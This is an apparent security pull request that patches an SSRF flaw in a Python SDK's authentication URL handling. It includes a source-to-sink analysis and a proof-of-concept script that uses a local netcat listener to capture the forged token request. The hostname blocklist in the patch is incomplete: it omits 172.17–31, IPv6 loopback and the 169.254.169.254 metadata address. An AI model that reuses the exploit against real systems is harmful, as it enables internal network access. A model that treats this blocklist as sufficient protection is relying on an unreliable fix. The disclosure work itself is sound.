### PR TITLE
Fixed SSRF that bypasses auth URL validation checks

### DIFF
--- a/src/fusion/authentication.py
+++ b/src/fusion/authentication.py
@@ -28,7 +28,23 @@ def _is_url(url: str) -> bool:
     """
     try:
         parsed = urlparse(url)
-        return all([parsed.scheme, parsed.netloc])
+        if not parsed.scheme or not parsed.netloc:
+            return False
+            
+        if parsed.scheme not in ["http", "https"]:
+            return False
+            
+        hostname = parsed.netloc.split(":")[0]
+        if (hostname == "localhost" or 
+            hostname == "127.0.0.1" or 
+            hostname.startswith("192.168.") or
+            hostname.startswith("10.") or
+            hostname.startswith("172.16.") or
+            hostname.startswith("fd") or
+            hostname.endswith(".local")):
+            return False
+            
+        return True
     except (ValueError, AttributeError):
         return False
 

--- a/src/fusion/credentials.py
+++ b/src/fusion/credentials.py
@@ -74,6 +74,20 @@ def fusion_url_to_auth_url(url: str) -> Optional[tuple]:
         parsed = urlparse(url)
         if not parsed.scheme or not parsed.netloc:
             raise ValueError("Invalid URL")
+            
+        if parsed.scheme not in ["http", "https"]:
+            raise CredentialError(f"URL scheme must be http or https, got: {parsed.scheme}, status code: 400")
+        
+        hostname = parsed.netloc.split(":")[0]
+        if (hostname == "localhost" or 
+            hostname == "127.0.0.1" or 
+            hostname.startswith("192.168.") or 
+            hostname.startswith("10.") or 
+            hostname.startswith("172.16.") or 
+            hostname.startswith("fd") or
+            hostname.endswith(".local")):
+            raise CredentialError(f"Access to internal networks not allowed: {hostname}, status code: 403")
+            
     except ValueError as err:
         raise CredentialError(f"Could not parse URL: {url}, status code: 400") from err
         


### PR DESCRIPTION
**Version**: v0.0.2

Insufficient URL validation allows attackers to influence the URL used in HTTP requests made by the SDK due to how it processes URLs during authentication token generation. When a URL containing specific path segments is supplied to the SDK, it extracts components from that URL and constructs a new authorization URL. However, during this transformation, it preserves the original scheme and host from the user-supplied URL without validation, allowing an attacker to specify arbitrary destinations for the resulting HTTP requests.

While there are some URL parsing checks in the code, they only verify structure without restricting schemes or destinations. The URL validation in `_is_url()` only checks for the presence of a scheme and netloc without restricting dangerous schemes like `file://`, `gopher://`, `dict://`, etc. This allows for protocol smuggling attacks and connections to unintended hosts.

### Source - Sink Analysis

1. **Source (Entry Point)**: External URL is received in `FusionOAuthAdapter.send()` 
   - File: `/src/fusion/authentication.py`
   - Line: `request.headers.update(self.credentials.get_fusion_token_headers(request.url))`
   - The external URL is passed from the request to the credential handler

2. **Transformation (Intermediate)**: URL is processed in `get_fusion_token_headers()`
   - File: `/src/fusion/credentials.py`
   - Line: `fusion_info = fusion_url_to_auth_url(url)`
   - The function passes the URL to the auth URL generator

3. **URL Construction (Intermediate)**: A new URL is generated in `fusion_url_to_auth_url()`
   - File: `/src/fusion/credentials.py` 
   - Line: `fusion_tk_url = f"{parsed.scheme}://{parsed.netloc}{new_path}"`
   - The function preserves the original scheme and netloc from the input URL
   - Only the path component is modified, adding `/authorize/token`

4. **Sink (Vulnerable Request)**: The request is made in `_gen_fusion_token()`
   - File: `/src/fusion/credentials.py`
   - Line: `response = requests.get(url, headers=headers, proxies=self.http_proxies)`
   - Makes an HTTP request to the constructed URL, which can point to arbitrary destinations

The failing validation can be seen in the `_is_url()` function in `/src/fusion/authentication.py`:
```python
def _is_url(url: str) -> bool:
    try:
        parsed = urlparse(url)
        return all([parsed.scheme, parsed.netloc])
    except (ValueError, AttributeError):
        return False
```

This function only checks if a scheme and netloc exist, without validating what they are.

### Proof of Concept

The following proof of concept demonstrates the vulnerability:

1. Create a `client_credentials.json` file:
```json
{
    "grant_type": "client_credentials",
    "client_id": "test_client_id",
    "client_secret": "test_client_secret",
    "resource": "test_resource",
    "auth_url": "https://example.com/token"
}
```

2. Create and run the PoC script (`poc.py`):
```python
import requests
import sys
import os

# add the src directory to the Python path
sys.path.append(os.path.join(os.path.dirname(__file__), 'src'))

# import the modules from src/fusion
from src.fusion.authentication import FusionOAuthAdapter
from src.fusion.credentials import FusionCredentials

# setup a custom session with our adapter
credentials = FusionCredentials.from_file("client_credentials.json")
session = requests.Session()

# set up a mock response for the authentication request
def mock_response(*args, **kwargs):
    mock_resp = requests.Response()
    mock_resp.status_code = 200
    mock_resp._content = b'{"access_token": "fake_token", "expires_in": 3600}'
    return mock_resp

original_post = requests.post
requests.post = mock_response

# create the adapter that's vulnerable to SSRF
adapter = FusionOAuthAdapter(credentials=credentials)
session.mount("http://", adapter)
session.mount("https://", adapter)

# for testing with a local server
local_test_url = "http://127.0.0.1:8888/catalogs/test/datasets/test/distributions/any"

# this will trigger the SSRF
try:
    print(f"Making request to: {local_test_url}")
    response = session.get(local_test_url)
    print(f"Response: {response}")
except Exception as e:
    print(f"Error (expected if testing locally): {e}")

requests.post = original_post
```

3. Start a netcat listener in another terminal:
```bash
nc -l 8888
```

4. Execute the PoC:
```bash
python poc.py
```

5. Observe the netcat listener receives a request like:

```bash
GET /catalogs/test/datasets/test/authorize/token HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: fusion-python-sdk 0.0.2
Accept-Encoding: gzip, deflate
Accept: /
Connection: keep-alive
Authorization: Bearer fake_token
```

This confirms that the SDK made a request to our listener using the scheme and host we provided, while modifying only the path component.

### Impact

While this vulnerability exists in a client SDK (rather than a server application), it still presents significant security risks:

- When integrated into applications, the SDK could be used to scan internal networks, access internal services, or bypass network controls.
- An attacker could use the vulnerability to exfiltrate sensitive data by directing requests to attacker-controlled servers.
- The vulnerability could be used to access cloud provider metadata services (e.g., AWS EC2 instance metadata) to extract sensitive information like temporary credentials.
